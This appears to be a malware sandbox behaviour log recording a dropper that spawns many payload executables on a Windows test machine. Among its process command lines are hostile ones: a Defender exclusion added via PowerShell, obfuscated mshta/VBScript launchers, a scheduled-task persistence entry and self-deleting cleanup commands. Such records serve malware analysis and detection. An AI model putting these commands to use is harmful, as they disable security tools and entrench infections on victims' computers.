Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\8149311.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 8 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 8 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 8 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2756 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe
PID 2756 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe
PID 2756 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe
PID 3636 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4044 wrote to memory of 4236 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat191649b47c9e2.exe
PID 4044 wrote to memory of 4236 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat191649b47c9e2.exe
PID 3184 wrote to memory of 4268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 4268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3184 wrote to memory of 4268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4152 wrote to memory of 4244 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19f84b58b3d7.exe
PID 4152 wrote to memory of 4244 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19f84b58b3d7.exe
PID 4208 wrote to memory of 4256 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe
PID 4208 wrote to memory of 4256 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe
PID 4208 wrote to memory of 4256 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe
PID 2948 wrote to memory of 4288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat1946eb84e6.exe
PID 2948 wrote to memory of 4288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat1946eb84e6.exe
PID 2948 wrote to memory of 4288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat1946eb84e6.exe
PID 4116 wrote to memory of 4304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e4750dd01.exe
PID 4116 wrote to memory of 4304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e4750dd01.exe
PID 4116 wrote to memory of 4304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e4750dd01.exe
PID 3452 wrote to memory of 4296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe
PID 3452 wrote to memory of 4296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe
PID 3452 wrote to memory of 4296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe
PID 4100 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat199ba8a4637dcb034.exe
PID 4100 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat199ba8a4637dcb034.exe
PID 4168 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19ba05e89ea6d406.exe
PID 4168 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19ba05e89ea6d406.exe
PID 4168 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19ba05e89ea6d406.exe
PID 4184 wrote to memory of 4336 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe
PID 4184 wrote to memory of 4336 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe
PID 4184 wrote to memory of 4336 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe
PID 4344 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19ba05e89ea6d406.exe C:\Users\Admin\AppData\Local\Temp\is-VI625.tmp\Sat19ba05e89ea6d406.tmp

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19ba05e89ea6d406.exe

Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\is-VI625.tmp\Sat19ba05e89ea6d406.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VI625.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$20148,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19ba05e89ea6d406.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe

Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat199ba8a4637dcb034.exe

Sat199ba8a4637dcb034.exe

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e4750dd01.exe

Sat19e4750dd01.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe

Sat196ac06a9e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat1946eb84e6.exe

Sat1946eb84e6.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe

Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19f84b58b3d7.exe

Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat191649b47c9e2.exe

Sat191649b47c9e2.exe

C:\Users\Admin\AppData\Local\Temp\is-JQ7NE.tmp\46807GHF____.exe

"C:\Users\Admin\AppData\Local\Temp\is-JQ7NE.tmp\46807GHF____.exe" /S /UID=burnerch2

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\ProgramData\1315498.exe

"C:\ProgramData\1315498.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\ProgramData\5906308.exe

"C:\ProgramData\5906308.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\ProgramData\1878738.exe

"C:\ProgramData\1878738.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\udptest.exe

"C:\Users\Admin\AppData\Local\Temp\udptest.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\ProgramData\365136.exe

"C:\ProgramData\365136.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\ProgramData\1878738.exe

"C:\ProgramData\1878738.exe"

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 948

C:\ProgramData\8149311.exe

"C:\ProgramData\8149311.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 660

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\is-N07PQ.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-N07PQ.tmp\setup_2.tmp" /SL5="$901DC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4712 -s 1564

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 672

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\365136.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\365136.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 680

C:\Users\Admin\AppData\Local\Temp\is-0KLL6.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-0KLL6.tmp\setup_2.tmp" /SL5="$20248,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 808

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\ProgramData\5674691.exe

"C:\ProgramData\5674691.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\ProgramData\3821390.exe

"C:\ProgramData\3821390.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\365136.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\365136.exe") do taskkill -Im "%~nxl" /F

C:\ProgramData\8538317.exe

"C:\ProgramData\8538317.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 840

C:\ProgramData\5005950.exe

"C:\ProgramData\5005950.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 856

C:\ProgramData\2744215.exe

"C:\ProgramData\2744215.exe"

C:\ProgramData\8538317.exe

"C:\ProgramData\8538317.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 948

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\5005950.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\5005950.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 900

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "365136.exe" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 968

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\5005950.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\5005950.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "5005950.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1036

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files\MSBuild\GNSNPOGKSY\ultramediaburner.exe

"C:\Program Files\MSBuild\GNSNPOGKSY\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-BDIR4.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-BDIR4.tmp\ultramediaburner.tmp" /SL5="$50262,281924,62464,C:\Program Files\MSBuild\GNSNPOGKSY\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\29-ed191-036-b3094-3522b1974493a\Rilijotusae.exe

"C:\Users\Admin\AppData\Local\Temp\29-ed191-036-b3094-3522b1974493a\Rilijotusae.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Local\Temp\c8-94b41-bd0-c5c87-2eedd73aefd53\Ponipevaeca.exe

"C:\Users\Admin\AppData\Local\Temp\c8-94b41-bd0-c5c87-2eedd73aefd53\Ponipevaeca.exe"

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im Sat19e6a852f849bb2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im Sat19e6a852f849bb2.exe /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wvthcstx.uzh\GcleanerEU.exe /eufive & exit

C:\Users\Admin\AppData\Local\Temp\wvthcstx.uzh\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\wvthcstx.uzh\GcleanerEU.exe /eufive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe /qn CAMPAIGN="654" & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kfcgfsk4.ydi\anyname.exe & exit

C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe

C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe /qn CAMPAIGN="654"

C:\Users\Admin\AppData\Local\Temp\kfcgfsk4.ydi\anyname.exe

C:\Users\Admin\AppData\Local\Temp\kfcgfsk4.ydi\anyname.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zdzubjlj.mxc\gcleaner.exe /mixfive & exit

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\zdzubjlj.mxc\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\zdzubjlj.mxc\gcleaner.exe /mixfive

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ynhysvvd.fn4\autosubplayer.exe /S & exit

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 25B79F743F791BED3AE4D4C913452F8E C

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

